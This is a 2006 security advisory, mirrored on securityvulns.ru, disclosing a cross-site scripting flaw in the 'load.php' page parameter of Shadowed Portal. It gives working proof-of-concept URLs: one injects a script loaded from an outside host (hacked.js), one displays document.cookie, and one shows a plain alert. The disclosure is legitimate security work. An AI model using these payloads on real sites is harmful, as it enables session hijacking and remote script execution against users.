Computer Security

Security Advisory: Shadowed Portal Cross Site Scripting
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Vulnerabilities in SPIP

  XMB Forum 1.9.5-Final XSS

  interaktiv.shop v.5 XSS vuln.

  MyBB 1.10 'newthread.
php' < CrossSiteScripting >

From::) :) <liz0_(at)_bsdmail.com>
Date:10.04.2006
Subject:Shadowed Portal Cross Site Scripting

---------------------------------------------------------------------------------
----
Shadowed Portal  Cross Site Scripting

Site:http://www.shad0wed.com/
Demo:http://www.shad0wed.com/

---------------------------------------------------
Credit : Liz0ziM
webpage:www.biyo.tk www.biyosecurity.be
Mail   :liz0@bsdmail.com

---------------------------------------------------------------------------------
----
Shadowed Portal
http://victim/path/load.php?mod=pages&page="><script src=http://liz0.li.funpic.org/hacked.js></script>
http://victim/path/load.
php?mod=pages&page="><script>alert(/BiyoSecurityTeam/)<
/script>
http://victim/path/load.
php?mod=pages&page="><script>alert(document.
cookie)</script>

---------------------------------------------------------------------------------
-------
Source:

http://www.blogcu.com/Liz0ziM/350164/

http://liz0zim.no-ip.org/shad0w.txt
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server